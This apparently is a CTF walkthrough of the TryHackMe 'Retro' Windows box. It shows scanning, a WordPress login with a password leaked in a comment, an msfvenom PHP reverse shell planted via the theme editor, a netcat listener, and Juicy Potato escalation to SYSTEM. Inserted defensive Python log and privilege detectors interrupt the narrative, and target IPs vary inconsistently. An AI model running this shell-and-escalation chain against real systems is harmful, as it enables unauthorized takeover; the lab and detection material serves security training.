Retro: a WordPress CTF

Retro is a free Windows box.

What you’ll learn

  • Importance of different wordlists
  • Consequence of SeImpersonatePrivilege

Port scans

One thing I noticed is that the OpenVPN tunnel created is a tun0 interface, rather than tap0 or the hypervisor-created eth0. This poses a problem for Unicornscan, which seems to work over a layer-2 (L2) network interface but not a layer-3 (L3) one. This was discussed in a HTB thread here. Unicornscan gave the error

Send exiting main didnt connect, exiting: system error Interrupted system call

Consequently I stuck with masscan, which worked for TCP scans. UDP scans are protocol-based and don’t seem to work well with most scanners, including nmap (see here for an open TFTP port nmap didn’t detect); nmap is probably still your best chance though.

root@Kali:~/TryHackme/Retro# masscan -p1-65535,U:1-65535 10.10.208.121 --rate=600 -e tun0

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2020-03-28 13:32:10 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.208.198                                   
Discovered open port 3389/tcp on 10.10.208.198           

Just two ports. Perfect. TCP service scan here. There seems to be nothing special in the nmap results though.

Web scans

amap didn’t return anything useful either.

amap v5.4 (www.thc.org/thc-amap) started at 2020-03-28 21:54:36 - APPLICATION MAPPING mode

Protocol on 10.10.208.198:80/tcp matches http
Protocol on 10.10.208.198:80/tcp matches http-apache-2
Protocol on 10.10.208.198:80/tcp matches http-iis

Unidentified ports: none.

amap v5.4 finished at 2020-03-28 21:54:36


root@Kali:~/TryHackme/Retro# gobuster dir -u http://10.10.208.198:80 -w /usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.208.198:80
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/03/28 21:55:16 Starting gobuster
===============================================================
===============================================================
2020/03/28 21:56:47 Finished
===============================================================

Routed through Burp, using an old User-Agent header:
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

root@Kali:~/TryHackme/Retro# gobuster dir -u http://10.10.208.198:80 -w /usr/share/dirb/wordlists/common.txt -p http://localhost:8081
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.208.198:80
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] Proxy:          http://localhost:8081
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/03/28 22:04:01 Starting gobuster
===============================================================
===============================================================
2020/03/28 22:08:03 Finished
===============================================================

It took me some time, but apparently the wordlist I used was insufficient. If I had used /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt instead, I would have found this.

root@Kali:~/TryHackme/Retro# gobuster dir -u http://192.168.92.134:80 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.218.121:80
[+] Threads:        10
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/03/29 14:57:25 Starting gobuster
===============================================================
/retro (Status: 301)
/Retro (Status: 301)
===============================================================
2020/03/29 14:57:43 Finished
===============================================================

Alternatively, take the hint that the name of the box might be a Web path. Scanning further down this path gave

root@Kali:~/TryHackme/Retro# gobuster dir -u http://10.10.208.121:80/retro -w /usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.208.121:80/retro
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/03/28 22:15:06 Starting gobuster
===============================================================
/index.php (Status: 301)
/wp-admin (Status: 301)
/wp-content (Status: 301)
/wp-includes (Status: 301)
===============================================================
2020/03/28 22:16:39 Finished
===============================================================

So we have a WordPress blog. But for some reason, with Burp as proxy, I kept getting redirected to localhost:80, which of course loaded nothing, so I had to do this to redirect it back.

root@Kali:~/TryHackme/Retro# ssh -L 80:10.10.208.121:80 localhost
root@localhost's password: 
Linux Kali 4.19.0-kali5-amd64 #1 SMP Debian 4.19.37-2kali1 (2019-05-15) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Sat Mar 28 20:35:25 2020 from ::1

That’s SSH local port forwarding, where you connect one of your own machine’s ports to a port on a remote server, like

ssh -L 8080:www.ubuntuforums.org:80 localhost

Now you can visit http://localhost:8080 to reach http://www.ubuntuforums.org:80.

After doing this I could visit http://10.10.208.121/retro/wp-admin. If you didn’t encounter this problem, don’t do this. After I upgraded Burp Suite, the problem stopped. The site looks like this

Now I had to point all my scans at localhost:80. Since we have a WordPress site I ran wpscan, which annoyingly moved to a freemium model limited to 5 results per day. Results here. This didn’t lead anywhere, since the vulnerabilities identified were XSS or required existing login access to the WordPress site.

WordPress login

The only way forward was to notice this comment,

which said

Wade
December 9, 2019
Leaving myself a note here just in case I forget how to spell it: parzival

If you try it on the WordPress admin login page (/retro/wp-login.php) it works (user: Wade, password: parzival).

Exploitation

Checking the Users section, we see quickly that Wade is a WP admin. Great.

That means we have rights to edit WordPress themes and replace them with our own code. Typically the WordPress exploitation-to-shell vector requires two things.

  1. Uploading a reverse Web shell.
  2. LFI, or being able to browse to that shell.

The theme used is 90’s Retro. Going to Appearance -> Theme Editor we can choose whichever page to edit. The best choice is usually 404.php, since that page loads whenever a non-existent page is requested on the WordPress site and the request gets redirected there, triggering the reverse shell. This time, though, I chose another page, page.php.

Now we just need a PHP reverse shell, so generate it via msfvenom.

root@Kali:~/TryHackme/Retro# msfvenom -a php --platform php -p php/reverse_php LHOST=10.9.21.147 LPORT=443 -o shell.php
No encoder or badchars specified, outputting raw payload
Payload size: 3044 bytes
Saved as: shell.php

Just copy and paste the entire PHP code, overwriting the existing code completely. Don’t leave any of the original code behind. I say this because when I first did it, I couldn’t get the reverse shell to trigger until I completely overwrote it. OK, now we just need to find a way to view page.php. Where could that be?

I could access the twentynineteen theme’s readme.txt here:

http://10.10.218.121/retro/wp-content/themes/twentynineteen/readme.txt

so I just needed to figure out the Web path for the 90’s Retro theme. After some Googling, I found its GitHub repo. The URL suggested the path could be /90s-retro/. Accessing http://10.10.218.121/retro/wp-content/themes/90s-retro/readme.txt works! So the uploaded reverse shell would be at http://10.10.218.121/retro/wp-content/themes/90s-retro/page.php

root@Kali:~/TryHackme/Retro# curl http://10.10.218.121/retro/wp-content/themes/90s-retro/page.php
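From the defender's side, the theme-editor-to-shell path above leaves two distinctive traces in the web server log: a POST to wp-admin/theme-editor.php (a theme file being saved) and a direct request for a .php template under wp-content/themes/, which WordPress normally only includes server-side and never serves on its own. The following detection is an added example, not code from the original post; the IIS W3C log lines are constructed to mirror this box's paths.

```python
"""Flag theme-editor saves and direct requests to theme PHP files in IIS W3C logs."""
import re
from dataclasses import dataclass

# Constructed sample log in IIS W3C format, modelled on the paths used on this box.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2020-03-28 21:55:16 GET /retro/ - 10.9.21.147 200
2020-03-28 22:20:01 GET /retro/wp-admin/theme-editor.php file=page.php&theme=90s-retro 10.9.21.147 200
2020-03-28 22:20:09 POST /retro/wp-admin/theme-editor.php - 10.9.21.147 302
2020-03-28 22:21:30 GET /retro/wp-content/themes/90s-retro/style.css - 10.9.21.147 200
2020-03-28 22:22:02 GET /retro/wp-content/themes/90s-retro/page.php - 10.9.21.147 200
2020-03-28 22:22:40 GET /retro/wp-content/themes/twentynineteen/readme.txt - 10.9.21.147 200
"""

# A save through the built-in editor is a POST to theme-editor.php (plugin-editor.php is the same idea).
EDITOR_SAVE = re.compile(r"/wp-admin/(theme|plugin)-editor\.php$")
# Theme templates are included by WordPress, so a direct GET for one is anomalous.
THEME_PHP = re.compile(r"/wp-content/themes/[^/]+/.+\.php$")


@dataclass
class Alert:
    rule: str
    client: str
    uri: str


def parse_w3c(text):
    """Yield one dict per record, using the #Fields header to name the columns."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed line: skip rather than misalign the columns
        yield dict(zip(fields, parts))


def detect(text):
    """Return the alerts raised over the log text, in log order."""
    alerts = []
    for rec in parse_w3c(text):
        uri = rec["cs-uri-stem"]
        if rec["cs-method"] == "POST" and EDITOR_SAVE.search(uri):
            alerts.append(Alert("theme_or_plugin_file_edited", rec["c-ip"], uri))
        elif THEME_PHP.search(uri):
            alerts.append(Alert("direct_theme_php_request", rec["c-ip"], uri))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Defining DISALLOW_FILE_EDIT as true in wp-config.php removes the theme and plugin editors entirely, which closes the first event at the source.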

Our listener (I switched from port 53 to 443 with another shell):

root@Kali:~/TryHackme/Retro# rlwrap -r nc -nlvp 443
listening on [any] 443 ...
connect to [10.9.21.147] from (UNKNOWN) [10.10.208.121] 52344
whoami && ipconfig /all
nt authority\iusr

Windows IP Configuration

   Host Name . . . . . . . . . . . . : RetroWeb
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : eu-west-1.ec2-utilities.amazonaws.com
                                       eu-west-1.compute.internal

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : eu-west-1.compute.internal
   Description . . . . . . . . . . . : AWS PV Network Device #0
   Physical Address. . . . . . . . . : 02-95-6F-53-23-2E
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::8d1d:a2be:a594:99d7%5(Preferred) 
   IPv4 Address. . . . . . . . . . . : 10.10.208.198(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Lease Obtained. . . . . . . . . . : Saturday, March 28, 2020 6:29:56 AM
   Lease Expires . . . . . . . . . . : Saturday, March 28, 2020 8:29:56 AM
   Default Gateway . . . . . . . . . : 10.10.0.1
   DHCP Server . . . . . . . . . . . : 10.10.0.1
   DHCPv6 IAID . . . . . . . . . . . : 100805359
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-7F-AD-F0-00-0C-29-6C-C0-28
   DNS Servers . . . . . . . . . . . : 10.0.0.2
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:ce5:276b:f5f5:2f39(Preferred) 
   Link-local IPv6 Address . . . . . : fe80::ce5:276b:f5f5:2f39%2(Preferred) 
   Default Gateway . . . . . . . . . : ::
   DHCPv6 IAID . . . . . . . . . . . : 134217728
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-7F-AD-F0-00-0C-29-6C-C0-28
   NetBIOS over Tcpip. . . . . . . . : Disabled

Tunnel adapter isatap.eu-west-1.compute.internal:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : eu-west-1.compute.internal
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

As per other walkthroughs, the credentials work for RDP too, the other open port on the box. If you’re going down that route, I prefer FreeRDP over rdesktop. This command is my go-to:

root@Kali:~/TryHackme/Retro# xfreerdp /v:10.10.218.121:3389 /u:Wade /p:parzival /size:90%

where /size scales it to 90% of your desktop resolution. Experiment and see what works for you. For the record, I tried other PHP reverse shells, such as this one and Pentestmonkey’s (replacing with cmd), but they didn’t work. Only msfvenom’s worked for me.

Post-exploitation

There are a few ways to achieve SYSTEM here. The intended method, explained here, didn’t work for me. What worked was either a kernel exploit specific to this version of Windows or the Juicy Potato exploit. First, note our privileges (we are IUSR, the IIS user). winPEAS highlights this too.

whoami /all

USER INFORMATION
----------------

User Name         SID     
================= ========
nt authority\iusr S-1-5-17


GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes                                        
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288                                                   
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Group used for deny only                          
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State  
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled
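When reviewing a token dump like the one above, whether from a compromised web worker or during an audit of service accounts, the question is which held privileges are effectively equivalent to local admin. The parser below is an added example and not part of the original post; it reads the whoami /priv table format shown here (the sample is a constructed copy of the IUSR section) and flags the privileges a defender should treat as high risk.

```python
"""Parse 'whoami /priv' output and flag privileges that enable local escalation."""
import re

# Constructed sample in the exact format of the whoami /priv table above.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name          Description                               State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking                  Enabled
SeImpersonatePrivilege  Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects                     Enabled
"""

# Privileges to treat as admin-equivalent when held by a web or service account.
# Holding the privilege is what matters: a process can re-enable one it owns.
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate other accounts' tokens (Potato-family escalation)",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a new process",
    "SeDebugPrivilege": "open and read any process, including LSASS",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel-mode drivers",
    "SeTcbPrivilege": "act as part of the operating system",
}

# Rows look like: "<SeXxxPrivilege>  <free-text description>  <Enabled|Disabled>".
ROW = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")


def parse_privileges(text):
    """Return {privilege_name: state} from the tabular section of whoami /priv."""
    privs = {}
    for line in text.splitlines():
        match = ROW.match(line)
        if match:
            privs[match.group(1)] = match.group(3)
    return privs


def flag_high_risk(privs):
    """Return [(privilege, state, why)] for every high-risk privilege in the token."""
    return [(name, state, HIGH_RISK[name]) for name, state in privs.items() if name in HIGH_RISK]


if __name__ == "__main__":
    held = parse_privileges(SAMPLE_WHOAMI_PRIV)
    for name, state, why in flag_high_risk(held):
        print(f"{name:32} {state:9} {why}")
```

SeImpersonatePrivilege is granted to IIS worker identities by design, so the mitigation is not to strip it but to keep the web process from reaching anything it can abuse (no writable PHP under the web root, current patches) and to alert when a web account spawns child processes it never normally would.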

We have SeImpersonatePrivilege. That means we can use Juicy Potato. Call it like this:

JuicyPotato.exe -l 443 -p C:\inetpub\wwwroot\retro\wp-content\themes\90s-retro\temp\shell443.exe -t * -c {5B3E6773-3A99-4A3D-8096-7765DD11785C}
Testing {5B3E6773-3A99-4A3D-8096-7765DD11785C} 443
......
[+] authresult 0
{5B3E6773-3A99-4A3D-8096-7765DD11785C};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

We should get a SYSTEM shell:

root@Kali:~/TryHackme/Retro# rlwrap -r nc -nlvp 443
listening on [any] 443 ...
connect to [10.9.21.147] from (UNKNOWN) [10.10.218.121] 50079
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /priv && ipconfig
whoami /priv && ipconfig

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State  
========================================= ================================================================== =======
SeAssignPrimaryTokenPrivilege             Replace a process level token                                      Enabled
SeLockMemoryPrivilege                     Lock pages in memory                                               Enabled
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeTcbPrivilege                            Act as part of the operating system                                Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeCreatePermanentPrivilege                Create permanent shared objects                                    Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeAuditPrivilege                          Generate security audits                                           Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

Windows IP Configuration


Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . : eu-west-1.compute.internal
   Link-local IPv6 Address . . . . . : fe80::acad:1add:8c0f:6899%5
   IPv4 Address. . . . . . . . . . . : 10.10.218.121
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 10.10.0.1

Tunnel adapter Teredo Tunneling Pseudo-Interface:

   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:3874:3db0:f5f5:2586
   Link-local IPv6 Address . . . . . : fe80::3874:3db0:f5f5:2586%2
   Default Gateway . . . . . . . . . : ::

Tunnel adapter isatap.eu-west-1.compute.internal:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : eu-west-1.compute.internal